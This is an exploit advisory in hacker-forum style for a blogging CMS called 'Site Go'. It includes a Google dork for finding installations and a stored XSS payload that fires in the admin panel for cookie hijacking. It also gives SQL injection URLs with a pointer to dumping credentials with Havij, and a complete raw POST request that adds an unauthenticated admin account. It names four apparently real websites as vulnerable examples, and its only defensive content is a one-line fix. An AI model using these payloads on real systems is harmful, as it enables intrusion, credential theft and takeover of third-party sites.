##############################################
# Exploit Title: Site Go - multiple Vulnerabilities #
# D0rk: allintitle: "بوابة التدوين" #
# Date: 12.mar.29 #
# Author: L3b-r1'z #
# Email Me : L3br1z@gmail.com \ L3b-r1z@live.com #
# Security : Low #
##############################################
Xss Vuln :
in search b0x , you can put ( <script>alert("Sec3ever")</script> ) And you will se the alert .
ok but this doesn't mean anything ;) , when the owner site open admin panel , he will se the alert ( you can hijacking the coockie )
Why ???
cz everything you write in search bar , Will Registered in Admin Panel ;)
Snap :
http://www10.0zz0.com/2012/03/29/13/713572158.png - pic num 1
http://www10.0zz0.com/2012/03/29/13/570372481.png - pic num 2
|0-0-0-0-0-0-0-0-0-0-0-0-0-0-0|
Sql I Vuln :
Is Too Simple , You Can Get The User and Pass From HAVIJ ;)
http://www.domain.tld/?gallery=class&class=5'
http://www.domain.tld/?gallery=class&class=5''a
http://www.domain.tld/?gallery=class&class=Sql Here
Snap :
http://www10.0zz0.com/2012/03/29/13/229680938.png
Example Site :
http://www.un-web.com/?gallery=class&class=5'
http://asdaa-lb.com/?gallery=ShowImg&Img=1'
http://el3sha.com/?gallery=ShowImg&Img=1'
http://muhageren.com/?articles=topic&topic=5'
|0-0-0-0-0-0-0-0-0-0-0-0-0-0-0|
Add Admin Vuln :
you can add admin from POST ( any tool like HACKBAR )
{
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://localhost/site-go/admin/?action=moderators&idm=add
Cookie: style_name=green; article_1=ok; __utma=111872281.668472016.1332650059.1332650059.1332650059.1; __utmz=111872281.1332650059.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=f7d80bbbc41018861f1056662d708699; phpwcmsBELang=en; CookieName=8a110d3sdf6e4558e3434616b750b11f
Content-Type: application/x-www-form-urlencoded
Content-Length: 237
(user=123456&pass=123456&email=L3br1z%40gmail.com&articles_mo=articles_mo&gallery_mo=gallery_mo&songs_mo=songs_mo&video_mo=video_mo&programs_mo=programs_mo&links_mo=links_mo&multi_mo=multi_mo&root_mo=root_mo&B1=%CA%E4%DD%ED%D0&sub_add=yes)
}
Snap :
http://www10.0zz0.com/2012/03/29/13/249898101.png - pic num 1
http://www10.0zz0.com/2012/03/29/13/605608097.png - pic num 2
|0-0-0-0-0-0-0-0-0-0-0-0-0-0-0|
How To Fix :
Add FireWall To Your Admin Panel
|0-0-0-0-0-0-0-0-0-0-0-0-0-0-0|
###################################################################################################
# Greet'z : B0x , Mad Hacker , Mr.Black , Unknown Hacker , Ked-Ans , I-Hmx , Sec4ever , TheInjector , Hacker-1420 .#
# SerialB0y , Rock!n , R0073r , And All Inj3ct0r Members , And All My Friends ;) #
###################################################################################################